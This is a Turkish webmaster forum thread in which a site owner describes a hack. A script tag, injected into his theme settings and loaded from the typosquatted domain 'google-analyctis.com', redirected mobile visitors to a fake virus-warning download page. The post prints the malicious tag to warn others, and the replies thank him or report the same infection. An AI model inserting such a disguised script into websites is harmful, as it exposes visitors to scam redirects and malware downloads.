• 13-06-2017, 04:41:41
    #1
    Selamlar.
    Bu hack olaylarında benim kadar başı yanan çok azdır. Siteye giriş varken mobilde, kazancın düştüğünü gözlemliyordum. Hiç akıl edip de mobilden deneme fırsatı bulamamıştım. Bir gireyim dedim, o ne! Sitemde yönlendirme var ve siteye giren girdi görünüyor ama 1-2 saniye sonra reklam koduyla beraber "telefonunuzda virüs var şu programı indirin" gibi bir siteye yönlendi.
    Bunu görünce temayı güncelledim. Ama temanın kendi ayarlar kısmı db'de kayıtlı olduğundan sadece kodlar değişiyordu, ver girişi değişmiyordu. Temayı istediğim kadar değişeyim o kısım silinmeyecekti. O kısım da bizim Google Analytics typo domainiyle alınan bir site ve ona ait kod.

    Kaynağı görüntüleyerek bakıyorum, benzediği gibi o koddan hiç şüphelenmiyorum. Meğerse hackle eklenmiş bir kod.

    Özetle: sitemize girenler tek kod eklememiş, başka yerlere de kod eklemiş. Bu kod da Google analytics gibi bir domain olunca onu bizim eklediğimizi düşünmüşüz. Ama öyle değilmiş.

    Görünümü şu şekilde:


    Kod ise şu:

    <script src="//apis.google-analyctis.com/ajax/libs/query/1/6/2/jquery/min"></script>
    O siteye girince pek de Google sitesi gibi durmuyor: http://google-analyctis.com/
    Gerçek Google sitesi: http://google-analytics.com/

    c'nin yeri farklı yapılarak sahte kodla milleti yani bizi keklemişler. Herkes sitesini kontrol etsin. Özellikle son hack olaylarından sonra.

    Saygılar.
  • 13-06-2017, 08:31:45
    #2
    Elinize sağlık hocam
  • 13-06-2017, 12:52:50
    #3
    Adamlar işi iyice geliştirmiş, hakikatende hangi webmaster bakarsa baksın şu kodun çakma olduğunu ilk seferde bilemez.
    hatta en son şüpheleneceğimiz kod o kod olur, bu arada emeğinize sağlık hocam bilgilenmiş olduk
  • 13-06-2017, 13:40:43
    #4
    Yıl 2017 ve siz hala analytics mi kullanıyorsunuz? Metrica gibi bir nimet varken.
  • 13-06-2017, 14:47:00
    #5
    Saldırıya uğramış kişilerden biriymişim meğer, teşekkürler konuyu açtığınız için. Peki kodun içeriği hakkında fikir sahibi olan var mı?
  • 13-06-2017, 16:34:20
    #6
    yararlı bilgi için teşekkürler.
  • 13-06-2017, 18:17:09
    #7
    myfurkanoymak adlı üyeden alıntı: mesajı görüntüle
    Elinize sağlık hocam
    The_Memo adlı üyeden alıntı: mesajı görüntüle
    Adamlar işi iyice geliştirmiş, hakikatende hangi webmaster bakarsa baksın şu kodun çakma olduğunu ilk seferde bilemez.
    hatta en son şüpheleneceğimiz kod o kod olur, bu arada emeğinize sağlık hocam bilgilenmiş olduk
    Hd2 adlı üyeden alıntı: mesajı görüntüle
    Saldırıya uğramış kişilerden biriymişim meğer, teşekkürler konuyu açtığınız için. Peki kodun içeriği hakkında fikir sahibi olan var mı?
    eranius adlı üyeden alıntı: mesajı görüntüle
    yararlı bilgi için teşekkürler.
    Rica ederim. İnşallah faydalı olur.

    DesignProject adlı üyeden alıntı: mesajı görüntüle
    Yıl 2017 ve siz hala analytics mi kullanıyorsunuz? Metrica gibi bir nimet varken.
    2017 yılında Metrica kullananı görmem beni de şaşırttı
  • 13-06-2017, 18:32:15
    #8
    Üyeliği durduruldu
    Ben şahsen böyle bir h-ack'de hayatta bulamazdım o kodu. Çünkü 1 harf değişimi ve benim gibi hiç bir webmaster o koddan eminim ki şüphelenmezdi.
  • 13-06-2017, 18:53:00
    #9
    Ben de söz konusu saldırıya maruz kalmışım. Konuyu açtığınız için teşekkürler.